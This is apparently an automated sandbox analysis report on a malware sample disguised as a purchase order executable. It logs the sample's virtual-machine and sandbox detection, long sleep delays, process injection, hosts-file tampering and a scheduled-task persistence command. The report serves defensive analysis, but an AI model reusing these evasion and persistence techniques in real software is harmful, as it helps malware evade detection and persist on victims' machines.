Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match

File source: Process Memory Space: PO #047428.exe PID: 4616, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: PO #047428.exe, 00000000.00000002.254689044.0000000002B70000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.334386716.00000000033EF000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: PO #047428.exe, 00000000.00000002.254689044.0000000002B70000.00000004.00000001.sdmp, kprUEGC.exe, 0000000E.00000002.334386716.00000000033EF000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe	Window / User API: threadDelayed 8411	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Window / User API: threadDelayed 1404	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Window / User API: threadDelayed 1747	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Window / User API: threadDelayed 8103	Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe TID: 4696	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe TID: 488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe TID: 6276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe TID: 6680	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe TID: 6684	Thread sleep count: 8411 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe TID: 6684	Thread sleep count: 1404 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe TID: 6680	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5440	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6416	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6396	Thread sleep count: 1747 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6396	Thread sleep count: 8103 > 30	Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PO #047428.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: kprUEGC.exe, 0000000E.00000002.334386716.00000000033EF000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: kprUEGC.exe, 0000000E.00000002.334386716.00000000033EF000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: kprUEGC.exe, 0000000E.00000002.334386716.00000000033EF000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: kprUEGC.exe, 0000000E.00000002.334386716.00000000033EF000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: kprUEGC.exe, 0000000E.00000002.334527728.0000000003440000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\PO #047428.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\PO #047428.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe	Memory written: C:\Users\user\Desktop\PO #047428.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Memory written: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe base: 400000 value starts with: 4D5A			Jump to behavior

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\PO #047428.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\Desktop\PO #047428.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Process created: C:\Users\user\Desktop\PO #047428.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmp3604.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe	Process created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}	Jump to behavior

Source: PO #047428.exe, 00000004.00000002.624307895.0000000001AC0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624102799.0000000001A50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: PO #047428.exe, 00000004.00000002.624307895.0000000001AC0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624102799.0000000001A50000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: PO #047428.exe, 00000004.00000002.624307895.0000000001AC0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624102799.0000000001A50000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: PO #047428.exe, 00000004.00000002.624307895.0000000001AC0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624102799.0000000001A50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: PO #047428.exe, 00000004.00000002.624307895.0000000001AC0000.00000002.00000001.sdmp, kprUEGC.exe, 00000013.00000002.624102799.0000000001A50000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Users\user\Desktop\PO #047428.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO #047428.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
